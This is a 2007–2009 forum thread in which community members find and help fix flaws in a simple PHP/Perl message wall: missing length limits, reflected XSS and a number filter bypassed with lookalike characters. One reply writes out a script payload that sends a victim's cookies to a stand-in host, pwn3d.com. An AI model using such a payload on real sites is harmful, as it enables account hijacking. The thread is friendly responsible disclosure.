Author Topic: Fruit Wall  (Read 5766 times)

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Fruit Wall
« on: February 04, 2007, 06:43:31 PM »
What happened to the FruitWall?
« Last Edit: February 28, 2009, 12:01:05 PM by rbcp »
"I bought a cactus and it died a week later... I was really depressed, I thought, 'Damn, I am less nurturing than a desert.'" -Demetri Martin

Offline gangals

  • Merp?
  • PLA Nation Citizen
  • *
  • Posts: 1031
  • 1337 13V3L: +68/-31
  • ummm cacti
    • http://img116.imageshack.us/img116/1879/bagmanonfire4pb.jpg
Re: Fruit Wall
« Reply #1 on: February 04, 2007, 07:21:08 PM »
If you look at the logs, someone from 149.9.0.57 has been abusing the wall.

http://phonelosers.org/php/fruitwall_log.html

Offline Raptor

  • OMG MOD wannabe
  • Ninja Phone Loser
  • ***
  • Posts: 1208
  • 1337 13V3L: +80/-52
  • We can be happy underground
Re: Fruit Wall
« Reply #2 on: February 04, 2007, 07:23:33 PM »
> If you look at the logs, someone from 149.9.0.57 has been abusing the wall.
>
> http://phonelosers.org/php/fruitwall_log.html

Damn, it's a good thing that message didn't end up getting displayed!
Raptor's Random Reviews!

http://www.phonelosers.org/forums/index.php?board=30.0

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #3 on: February 04, 2007, 08:14:12 PM »
It was displayed last night.  That's when I took it down.  There's a simple line I can add to the Perl code of FruitWall to make that not happen anymore, but I've been lazy about it these past couple years.  Once I get around to fixing it, I'll put it back up.

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #4 on: February 05, 2007, 03:09:49 PM »
Oh, okay. I knew about the bug, but I didn't realize it was being used for abuse. I did post a few messages a while back slightly too long taunting people to try and repost them, just to have some fun, but I did not do anything extreme like that guy.

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #5 on: February 11, 2007, 07:42:15 PM »
I just took a look at the FruitWall Perl code. You should be able to fix it by changing the line that reads

    if ($ENV{'HTTP_REFERER'} =~ "$wallpage") {

to

    if ( ($ENV{'HTTP_REFERER'} =~ "$wallpage") && (length($lalalala) <= 75) ) {

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #6 on: February 28, 2009, 12:00:50 PM »
Today I finally wrote a PHP version of FruitWall and put it up on the main page.  Go look, try it out, and please post here if you find a way to hax0r me.  As of now, the "color" and "link" options don't do anything, but I'm going to make those work soon.  I think I've made it so html can't be posted into the form, but we'll see.  I've also banned most numbers since people love posting phone numbers on it.

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #7 on: February 28, 2009, 12:07:05 PM »
Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #8 on: February 28, 2009, 12:08:56 PM »
> Yeah, you need to set a maximum length. I just set it to "abcdefghijklmnopqrstuvwxyz" repeated a bunch, and it screwed up your whole layout. And this time, put the limit in the PHP code, and not just in the HTML form like you did with the old Fruitwall.

Thanks, I'm working on that now.  And I DID put it in the Perl code on the old one after a few years of just having it in the form.

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #9 on: February 28, 2009, 12:27:20 PM »
Got the length problem fixed.  Only 80 characters are allowed now.

Next problem?

Offline Godot

  • Go away, PLA!
  • PLA Corporate Drone
  • *****
  • Posts: 427
  • 1337 13V3L: +34/-7
    • Godot's Website
Re: Fruit Wall
« Reply #10 on: February 28, 2009, 01:35:37 PM »
> Next problem?

If a user is dumb enough to listen to somebody else who tells him to try to post a certain message to the Fruit Wall, that user could get his cookies stolen, which possibly could give the attacker access to his account.

The victim would be told to enter something like

    <script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script>

which would send his cookies to whoever runs pwn3d.com.

To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #11 on: February 28, 2009, 02:25:42 PM »
> The victim would be told to enter something like
>
>     <script>document.location="http://pwn3d.com/c.php?c="+document.cookie;</script>
>
> which would send his cookies to whoever runs pwn3d.com.
>
> To fix it, just use htmlspecialchars($forbidden_text) instead of $forbidden_text when you output the "OMG WTF, you can't type..." error message.

Thanks for the tip.  I just made it so it doesn't display what they're not allowed to type anymore.

Also, I decided to take away the ability to post colors or a link.  I had those parts working, but with the link I couldn't figure out a good way to post both the link to change the message and the submitted link.  And colors were just pointless.  I've got it all logging everything with IP addresses now too.

Offline Magus

  • PLA Minion
  • *****
  • Posts: 654
  • 1337 13V3L: +56/-108
  • "The forums token cranky old man." -Jenn
    • sebanderson.com
Re: Fruit Wall
« Reply #12 on: February 28, 2009, 10:59:02 PM »
Check the fruitwall --
I typed this and it worked:

OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

You might want to ban most characters besides A-Z, underscores, hyphens, etc.
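The three fixes the thread arrives at (a length limit enforced server-side rather than only in the form, rejecting the lookalike non-Latin letters Magus used to slip past the number ban, and escaping the reflected forbidden text with htmlspecialchars before echoing the error) combined in one PHP check. This is an added example, not rbcp's FruitWall code; the function names, the forbidden-pattern list and the sample messages are assumptions constructed for illustration.

```php
<?php
// Added example, not rbcp's FruitWall code. Function names, the forbidden
// pattern list and the sample messages are assumptions. Needs mbstring.
declare(strict_types=1);
const MAX_LEN = 80;                             // rbcp's limit from Reply #9
const FORBIDDEN = ['/[0-9]/', '/<\s*script/i']; // digits (phone numbers), script tags

// Returns null when $msg may be posted, otherwise an HTML-safe error string.
function fruitwall_check(string $msg): ?string {
    // 1. Length limit enforced in PHP, not only in the form's maxlength
    //    (Reply #7). mb_strlen counts characters rather than UTF-8 bytes.
    if (mb_strlen($msg, 'UTF-8') > MAX_LEN) {
        return 'OMG WTF, your message is too long (max ' . MAX_LEN . ' characters).';
    }
    // 2. Lookalike characters (Reply #12): Greek or Cyrillic letters pass a
    //    filter written for Latin text. Allow printable ASCII only.
    if (preg_match('/[^\x20-\x7E]/', $msg)) {
        return 'OMG WTF, only plain ASCII characters are allowed.';
    }
    // 3. Forbidden content. The part of the input echoed back in the error is
    //    escaped (Reply #10); echoing it raw would run a pasted <script> in the
    //    browser of whoever submitted the form.
    foreach (FORBIDDEN as $re) {
        if (preg_match($re, $msg, $m)) {
            $forbidden_text = $m[0];
            return "OMG WTF, you can't type "
                . htmlspecialchars($forbidden_text, ENT_QUOTES, 'UTF-8')
                . ' on the wall.';
        }
    }
    return null;
}

// The accepted message is escaped on output as well, so no HTML is injected.
function fruitwall_render(string $msg): string {
    return '<div class="wall">' . htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') . '</div>';
}

// Constructed sample inputs, one per check.
$samples = [
    'hello wall',                                  // accepted, rendered escaped
    str_repeat('abcdefghijklmnopqrstuvwxyz', 4),   // 104 chars: rejected as too long
    'call 5551234',                                // digits: rejected
    'Οne twο thrее',                               // non-Latin lookalikes: rejected
    '<script>alert("xss")</script>',               // rejected, echoed escaped
];
foreach ($samples as $s) {
    echo fruitwall_check($s) ?? fruitwall_render($s), "\n";
}
```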

Offline rbcp

  • Head Custodian
  • Administrator
  • Ninja Phone Loser
  • *****
  • Posts: 5259
  • 1337 13V3L: +454/-81
  • I'm not stupid! I'm not stupid! Hematology!
    • Homepage
Re: Fruit Wall
« Reply #13 on: March 01, 2009, 07:46:55 AM »
> Check the fruitwall --
> I typed this and it worked:
>
> OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn

How'd you do that?  Are you using those crazy ascii codes or something?

Offline Magus

  • PLA Minion
  • *****
  • Posts: 654
  • 1337 13V3L: +56/-108
  • "The forums token cranky old man." -Jenn
    • sebanderson.com
Re: Fruit Wall
« Reply #14 on: March 01, 2009, 10:38:04 AM »
> Check the fruitwall --
> I typed this and it worked:
>
> OMG HAX!!! - Οne twο thrее fοur fivе ѕix sеven еight ninе tеn
>
> How'd you do that?  Are you using those crazy ascii codes or something?

ASCII = Yes.
It would seem that I'm also 31773 like you hacker folks.
« Last Edit: March 01, 2009, 10:43:06 AM by Magus »